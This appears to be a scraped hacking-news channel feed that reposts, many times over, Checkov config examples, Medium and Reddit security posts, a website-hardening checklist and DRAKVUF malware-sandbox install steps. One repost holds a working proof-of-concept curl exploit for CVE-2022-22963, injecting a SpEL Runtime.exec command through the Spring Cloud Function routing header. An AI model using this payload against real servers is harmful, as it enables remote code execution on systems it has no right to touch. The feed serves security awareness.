Hacking Articles Tips Tricks Videos Tutorials
cluded in the output ExampleThe following comment skips the CKV_AWS_20check on the resource identified by foo-bucket, where the scan checks if an AWS S3 bucket is private. In the example, the bucket is configured with public read access; Adding the suppress…
reate-config /Users/sample/config.yml
Will create a
branch: develop
check:
* CKV_DOCKER_1
compact: true
directory:
* test-dir
docker-image: sample-image
dockerfile-path: Dockerfile
download-external-modules: true
evaluate-variables: true
external-checks-dir:
* sample-dir
external-modules-download-path: .external_modules
framework:
* all
no-guide: true
output: cli
quiet: true
repo-id: bridgecrew/sample-repo
skip-check:
* CKV_DOCKER_3
* CKV_DOCKER_2
skip-fixes: true
skip-framework:
* dockerfile
* secrets
skip-suppressions: true
soft-fail: true
Users can also use the
checkov –show-config
Will display:
Command Line Args: –show-config
Environment Variables:
BC_API_KEY: your-api-key
Config File (/Users/sample/.checkov.yml):
soft-fail: False
branch: master
skip-check: [‘CKV_DOCKER_3’, ‘CKV_DOCKER_2’]
Defaults:
–output: cli
–framework: [‘all’]
–download-external-modules:False
–external-modules-download-path:.external_modules
–evaluate-variables:True Download
___________________________
@hacking_Attack
@Hacking_Video
Will create a
config.yamlfile which looks like this:branch: develop
check:
* CKV_DOCKER_1
compact: true
directory:
* test-dir
docker-image: sample-image
dockerfile-path: Dockerfile
download-external-modules: true
evaluate-variables: true
external-checks-dir:
* sample-dir
external-modules-download-path: .external_modules
framework:
* all
no-guide: true
output: cli
quiet: true
repo-id: bridgecrew/sample-repo
skip-check:
* CKV_DOCKER_3
* CKV_DOCKER_2
skip-fixes: true
skip-framework:
* dockerfile
* secrets
skip-suppressions: true
soft-fail: true
Users can also use the
--show-configflag to view all the args and settings and where they came from i.e. commandline, config file, environment variable or default. For example:checkov –show-config
Will display:
Command Line Args: –show-config
Environment Variables:
BC_API_KEY: your-api-key
Config File (/Users/sample/.checkov.yml):
soft-fail: False
branch: master
skip-check: [‘CKV_DOCKER_3’, ‘CKV_DOCKER_2’]
Defaults:
–output: cli
–framework: [‘all’]
–download-external-modules:False
–external-modules-download-path:.external_modules
–evaluate-variables:True Download
___________________________
@hacking_Attack
@Hacking_Video
Hacking on Medium
Protection Against Data Tampering
https://cdn-images-1.medium.com/max/2600/1*3KOlRaYoX8wAJEXyAx4vMg.jpeg
For a long time, data tampering was limited to simple attacks such as data corruption which is immediately noticed, or “cooking the books”…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Protection Against Data Tampering
https://cdn-images-1.medium.com/max/2600/1*3KOlRaYoX8wAJEXyAx4vMg.jpeg
For a long time, data tampering was limited to simple attacks such as data corruption which is immediately noticed, or “cooking the books”…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Protection Against Data Tampering
For a long time, data tampering was limited to simple attacks such as data corruption which is immediately noticed, or “cooking the books”…
Hacking on Medium
Cyberattack: How To Protect Your Finances Online.
https://cdn-images-1.medium.com/max/852/1*-H_QYAnjJcSFO_4DB_b2aA.jpeg
The cyberattack, it’s a term that no longer needs explanation.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Cyberattack: How To Protect Your Finances Online.
https://cdn-images-1.medium.com/max/852/1*-H_QYAnjJcSFO_4DB_b2aA.jpeg
The cyberattack, it’s a term that no longer needs explanation.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Cyberattack: How To Protect Your Finances Online.
The cyberattack, it’s a term that no longer needs explanation. It’s almost 100% certain that if you’ve been on the internet for any time at…
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability
https://blogger.googleusercontent.com/img/a/AVvXsEilWkK-FPAHhY2QeYOmsLsM-kP1C10az0AOqwJ_niOh9uN1mEZeepHZOtVxi-grt1ZtdY24_cFBoJNPX-0MksoeZtPnEknxVg_GyBumJdWB4TIadM3PpxhyFOT-oToifQDbxJBD3B2F5nR7kxEt6gKYVDAEiLqImwp-DUxjzKgdwb5mrgsKRqU3HDJK=w640-h270
To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example:
Exploit
Curl command:
Or using Burp suite:
https://blogger.googleusercontent.com/img/a/AVvXsEilWkK-FPAHhY2QeYOmsLsM-kP1C10az0AOqwJ_niOh9uN1mEZeepHZOtVxi-grt1ZtdY24_cFBoJNPX-0MksoeZtPnEknxVg_GyBumJdWB4TIadM3PpxhyFOT-oToifQDbxJBD3B2F5nR7kxEt6gKYVDAEiLqImwp-DUxjzKgdwb5mrgsKRqU3HDJK=w640-h270
Credits
https://github.com/hktalent/spring-spel-0day-poc
Download CVE-2022-22963
___________________________
@hacking_Attack
@Hacking_Video
CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability
https://blogger.googleusercontent.com/img/a/AVvXsEilWkK-FPAHhY2QeYOmsLsM-kP1C10az0AOqwJ_niOh9uN1mEZeepHZOtVxi-grt1ZtdY24_cFBoJNPX-0MksoeZtPnEknxVg_GyBumJdWB4TIadM3PpxhyFOT-oToifQDbxJBD3B2F5nR7kxEt6gKYVDAEiLqImwp-DUxjzKgdwb5mrgsKRqU3HDJK=w640-h270
To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example:
docker run -it -d -p 8080:8080 bobcheat/springboot-public
Exploit
Curl command:
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'
Or using Burp suite:
https://blogger.googleusercontent.com/img/a/AVvXsEilWkK-FPAHhY2QeYOmsLsM-kP1C10az0AOqwJ_niOh9uN1mEZeepHZOtVxi-grt1ZtdY24_cFBoJNPX-0MksoeZtPnEknxVg_GyBumJdWB4TIadM3PpxhyFOT-oToifQDbxJBD3B2F5nR7kxEt6gKYVDAEiLqImwp-DUxjzKgdwb5mrgsKRqU3HDJK=w640-h270
Credits
https://github.com/hktalent/spring-spel-0day-poc
Download CVE-2022-22963
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability
hacking: security in practice
Am I compromised ?
I was playing counter strike 1.6 and half life online (not through the official version) and I think I joined what might be russian servers which had custom mods and maps. And now I'm scared that what if installing them got me a spyware or something like that. (I hate how I didn't think of this before or Maybe did).
Am i comprised ?
submitted by /u/afraidanddepressed
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Am I compromised ?
I was playing counter strike 1.6 and half life online (not through the official version) and I think I joined what might be russian servers which had custom mods and maps. And now I'm scared that what if installing them got me a spyware or something like that. (I hate how I didn't think of this before or Maybe did).
Am i comprised ?
submitted by /u/afraidanddepressed
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Am I compromised ?
I was playing counter strike 1.6 and half life online (not through the official version) and I think I joined what might be russian servers which...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
How to Keep a Website Secure?
It is always better to be proactive and prevent website security disasters rather than fighting after the disaster itself. It is also cheaper to activate security measurement than pay for the recovery of an infected website. We can do the following things to keep our website secure.
* Installing SSL Certificate and Using HTTPS Protocol
* Keep Software and Plugins Up-To-Date
* Choose Web Hosting Wisely
* Having Strong Login Credentials or Password
* Keep Your Personal Devices Secure
* Add Tools for Scan and Monitor Website
* Sucuri SiteCheck
* Quttera
* Siteguarding etc
* Check User Access and Permissions
* Website Backup
* Do not keep default CMS Settings Configuration
* Precautions for File Uploads
* Keep Website Clean - Delete unused files
* Web Server Security - Limit access to root files
* Use Website Firewall
* Best Practices Personal Security
submitted by /u/shuvonaz
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How to Keep a Website Secure?
It is always better to be proactive and prevent website security disasters rather than fighting after the disaster itself. It is also cheaper to activate security measurement than pay for the recovery of an infected website. We can do the following things to keep our website secure.
* Installing SSL Certificate and Using HTTPS Protocol
* Keep Software and Plugins Up-To-Date
* Choose Web Hosting Wisely
* Having Strong Login Credentials or Password
* Keep Your Personal Devices Secure
* Add Tools for Scan and Monitor Website
* Sucuri SiteCheck
* Quttera
* Siteguarding etc
* Check User Access and Permissions
* Website Backup
* Do not keep default CMS Settings Configuration
* Precautions for File Uploads
* Keep Website Clean - Delete unused files
* Web Server Security - Limit access to root files
* Use Website Firewall
* Best Practices Personal Security
submitted by /u/shuvonaz
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How to Keep a Website Secure?
It is always better to be proactive and prevent website security disasters rather than fighting after the disaster itself. It is also cheaper to...
Hats Protocol Economics — Part I
Long-term sustainability and token utilityContinue reading on Medium »
Read more...
Long-term sustainability and token utilityContinue reading on Medium »
Read more...
Hats Protocol Economics — Part I
https://hatsfinance.medium.com/hats-protocol-economics-part-i-46c0220af53?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://hatsfinance.medium.com/hats-protocol-economics-part-i-46c0220af53?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hats Protocol Economics — Part I
Long-term sustainability and token utility
Long-term sustainability and token utilityContinue reading on Medium » (https://hatsfinance.medium.com/hats-protocol-economics-part-i-46c0220af53?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hats Protocol Economics — Part I
Long-term sustainability and token utility
80+ million Digilocker user’s phone numbers exposed [Fixed]
This is a story about my last finding at digilocker. In bug bounty we call these type issue as ‘low hanging fruits’. I already contribute…Continue reading on Medium »
Read more...
This is a story about my last finding at digilocker. In bug bounty we call these type issue as ‘low hanging fruits’. I already contribute…Continue reading on Medium »
Read more...
80+ million Digilocker user’s phone numbers exposed [Fixed]
https://dewcode.medium.com/80-million-digilocker-users-phone-numbers-exposed-fixed-7b49851c43f?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://dewcode.medium.com/80-million-digilocker-users-phone-numbers-exposed-fixed-7b49851c43f?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
80+ million Digilocker user’s phone numbers exposed [Fixed]
This is a story about my last finding at digilocker. In bug bounty we call these type issue as ‘low hanging fruits’. I already contribute…
This is a story about my last finding at digilocker. In bug bounty we call these type issue as ‘low hanging fruits’. I already contribute…Continue reading on Medium » (https://dewcode.medium.com/80-million-digilocker-users-phone-numbers-exposed-fixed-7b49851c43f?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
80+ million Digilocker user’s phone numbers exposed [Fixed]
This is a story about my last finding at digilocker. In bug bounty we call these type issue as ‘low hanging fruits’. I already contribute…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
DRAKVUF Sandbox : Automated Hypervisor-Level Malware Analysis System
DRAKVUF Sandbox is an automated black-box malware analysis system with DRAKVUF engine under the hood, which does not require an agent on guest OS.
This project provides you with a friendly web interface that allows you to upload suspicious files to be analyzed. Once the sandboxing job is finished, you can explore the analysis result through the mentioned interface and get an insight on whether the file is truly malicious or not.
Because it is usually pretty hard to set up a malware sandbox, this project also provides you with an installer app that would guide you through the necessary steps and configure your system using settings that are recommended for beginners. At the same time, experienced users can tweak some settings or even replace some infrastructure parts to better suit their needs. Supported hardware & softwareIn order to run DRAKVUF Sandbox, your setup must fullfill all of the listed requirements:
* Processor: Intel processor with VT-x and EPT features (how to check).
* Host system: Debian 10 Buster/Ubuntu 18.04 Bionic/Ubuntu 20.04 Focal with at least 2 core CPU and 5 GB RAM, running GRUB as bootloader.
* Guest system: Windows 7 (x64), Windows 10 (x64; experimental support)
Nested virtualization:
* KVM does work, however it is considered experimental. If you experience any bugs, please report them to us for further investigation.
* Due to lack of exposed CPU features, hosting DRAKVUF Sandbox in the cloud is not supported (although it might change in the future).
* Hyper-V does not work.
* Xen does work out of the box.
* VMware Workstation Player does work, but you need to check Virtualize EPT option for a VM; Intel processor with EPT still required. Basic installationThis instruction assumes that you want to create a single-node installation with the default components, which is recommended for beginners.
* Download latest release packages.
* Install DRAKVUF:
# apt update
# apt install ./drakvuf-bundle*.deb
# reboot
* Install DRAKVUF Sandbox stack:
apt install redis-server
apt install ./drakcore.deb apt install ./drakrun.deb
* Check if your Xen installation is compliant. This command should print “All tests passed”:
draksetup test
Execute:
draksetup install /opt/path_to_windows.iso
Read the command’s output carefully. This command will run a virtual machine with Windows system installation process.
Customize vCPUs/memory: You can pass additional options in order to customize number of vCPUs (--vcpus ) and amount of memory (--memory ) per single VM. For instance:
Recommended minimal values that are known to work properly with DRAKVUF Sandbox:
System versionMinimal vCPUsMinimal RAMWindows 711536Windows 1023072
Unattended installation: If you have
Use VNC to connect to the installation process:
vncviewer localhost:5900
* Perform Windows installation until you are booted to the desktop.
* Optional: At this point you might optionally install additional software. You can execute:
draksetup mount /path/to/some-cd.iso
* which would mount a virtual CD disk containing additional software into your VM.
* Optional: Generate .NET Framework native image cache by executing the following commands in the administrative prompt of your VM.
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319
ngen.exe executeQueuedItems cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319
ngen.exe executeQueuedItems
In order to finalize the VM setup process, exe[...]
___________________________
@hacking_Attack
@Hacking_Video
DRAKVUF Sandbox : Automated Hypervisor-Level Malware Analysis System
DRAKVUF Sandbox is an automated black-box malware analysis system with DRAKVUF engine under the hood, which does not require an agent on guest OS.
This project provides you with a friendly web interface that allows you to upload suspicious files to be analyzed. Once the sandboxing job is finished, you can explore the analysis result through the mentioned interface and get an insight on whether the file is truly malicious or not.
Because it is usually pretty hard to set up a malware sandbox, this project also provides you with an installer app that would guide you through the necessary steps and configure your system using settings that are recommended for beginners. At the same time, experienced users can tweak some settings or even replace some infrastructure parts to better suit their needs. Supported hardware & softwareIn order to run DRAKVUF Sandbox, your setup must fullfill all of the listed requirements:
* Processor: Intel processor with VT-x and EPT features (how to check).
* Host system: Debian 10 Buster/Ubuntu 18.04 Bionic/Ubuntu 20.04 Focal with at least 2 core CPU and 5 GB RAM, running GRUB as bootloader.
* Guest system: Windows 7 (x64), Windows 10 (x64; experimental support)
Nested virtualization:
* KVM does work, however it is considered experimental. If you experience any bugs, please report them to us for further investigation.
* Due to lack of exposed CPU features, hosting DRAKVUF Sandbox in the cloud is not supported (although it might change in the future).
* Hyper-V does not work.
* Xen does work out of the box.
* VMware Workstation Player does work, but you need to check Virtualize EPT option for a VM; Intel processor with EPT still required. Basic installationThis instruction assumes that you want to create a single-node installation with the default components, which is recommended for beginners.
* Download latest release packages.
* Install DRAKVUF:
# apt update
# apt install ./drakvuf-bundle*.deb
# reboot
* Install DRAKVUF Sandbox stack:
apt install redis-server
apt install ./drakcore.deb apt install ./drakrun.deb
* Check if your Xen installation is compliant. This command should print “All tests passed”:
draksetup test
Execute:
draksetup install /opt/path_to_windows.iso
Read the command’s output carefully. This command will run a virtual machine with Windows system installation process.
Customize vCPUs/memory: You can pass additional options in order to customize number of vCPUs (--vcpus ) and amount of memory (--memory ) per single VM. For instance:
--vcpus 1 --memory 2048.Recommended minimal values that are known to work properly with DRAKVUF Sandbox:
System versionMinimal vCPUsMinimal RAMWindows 711536Windows 1023072
Unattended installation: If you have
autounattend.xmlmatching your Windows ISO, you can request unattended installation by adding --unattended-xml /path/to/autounattend.xml. Unattended install configuration can be generated with Windows Answer File Generator.Use VNC to connect to the installation process:
vncviewer localhost:5900
* Perform Windows installation until you are booted to the desktop.
* Optional: At this point you might optionally install additional software. You can execute:
draksetup mount /path/to/some-cd.iso
* which would mount a virtual CD disk containing additional software into your VM.
* Optional: Generate .NET Framework native image cache by executing the following commands in the administrative prompt of your VM.
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319
ngen.exe executeQueuedItems cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319
ngen.exe executeQueuedItems
In order to finalize the VM setup process, exe[...]
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
DRAKVUF Sandbox : Automated Hypervisor-Level MAS
DRAKVUF Sandbox is an automated black-box malware analysis system with DRAKVUF engine under the hood which does not require an agent.
Kali Linux Tutorials
DRAKVUF Sandbox : Automated Hypervisor-Level Malware Analysis System
___________________________
@hacking_Attack
@Hacking_Video
DRAKVUF Sandbox : Automated Hypervisor-Level Malware Analysis System
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
DRAKVUF Sandbox : Automated Hypervisor-Level MAS
DRAKVUF Sandbox is an automated black-box malware analysis system with DRAKVUF engine under the hood which does not require an agent.